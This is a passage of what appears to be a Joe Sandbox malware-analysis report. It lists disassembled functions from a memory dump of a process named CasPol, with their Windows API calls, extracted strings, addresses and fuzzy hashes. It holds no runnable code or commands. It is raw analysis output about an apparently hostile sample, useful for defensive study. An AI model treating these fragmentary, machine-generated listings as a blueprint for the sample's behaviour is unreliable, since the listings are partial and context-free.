                                                                                                • API String ID: 3979103747-598926743
                                                                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                • API String ID: 2780580303-317687271
                                                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                APIs
                                                                                                • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                • GetLastError.KERNEL32 ref: 0041855C
                                                                                                • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                • GetLastError.KERNEL32 ref: 0041858E
                                                                                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                • free.MSVCRT ref: 004185AC
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                • String ID:
                                                                                                • API String ID: 2802642348-0
                                                                                                • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                • String ID: strings
                                                                                                • API String ID: 3166385802-3030018805
                                                                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                APIs
                                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                • memset.MSVCRT ref: 00405455
                                                                                                • memset.MSVCRT ref: 0040546C
                                                                                                • memset.MSVCRT ref: 00405483
                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                                • String ID: 6$\
                                                                                                • API String ID: 404372293-1284684873
                                                                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                APIs
                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1331804452-0
                                                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                APIs
                                                                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                • String ID: advapi32.dll
                                                                                                • API String ID: 2012295524-4050573280
                                                                                                • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                APIs
                                                                                                Strings
                                                                                                • <%s>, xrefs: 004100A6
                                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$_snwprintf
                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                • API String ID: 3473751417-2880344631
                                                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                • String ID: %2.2X
                                                                                                • API String ID: 2521778956-791839006
                                                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                APIs
                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                • memset.MSVCRT ref: 0040C439
                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                • String ID:
                                                                                                • API String ID: 4131475296-0
                                                                                                • Opcode ID: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                • Opcode Fuzzy Hash: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                APIs
                                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                • malloc.MSVCRT ref: 00417524
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                • free.MSVCRT ref: 00417544
                                                                                                • free.MSVCRT ref: 00417562
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                • String ID:
                                                                                                • API String ID: 4131324427-0
                                                                                                • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                APIs
                                                                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                • free.MSVCRT ref: 0041822B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: PathTemp$free
                                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                                • API String ID: 924794160-1420421710
                                                                                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                APIs
                                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                • free.MSVCRT ref: 004174E4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                • String ID:
                                                                                                • API String ID: 4053608372-0
                                                                                                • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                APIs
                                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                • String ID:
                                                                                                • API String ID: 4247780290-0
                                                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                APIs
                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                • memset.MSVCRT ref: 004450CD
                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                • String ID:
                                                                                                • API String ID: 1471605966-0
                                                                                                • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 004100FB
                                                                                                • memset.MSVCRT ref: 00410112
                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                • String ID: </%s>
                                                                                                • API String ID: 3400436232-259020660
                                                                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                • String ID: caption
                                                                                                • API String ID: 1523050162-4135340389
                                                                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                APIs
                                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                • String ID: MS Sans Serif
                                                                                                • API String ID: 210187428-168460110
                                                                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 00412057
                                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                • String ID:
                                                                                                • API String ID: 3550944819-0
                                                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                APIs
                                                                                                • free.MSVCRT ref: 0040F561
                                                                                                • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$free
                                                                                                • String ID: g4@
                                                                                                • API String ID: 2888793982-2133833424
                                                                                                • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 004144E7
                                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
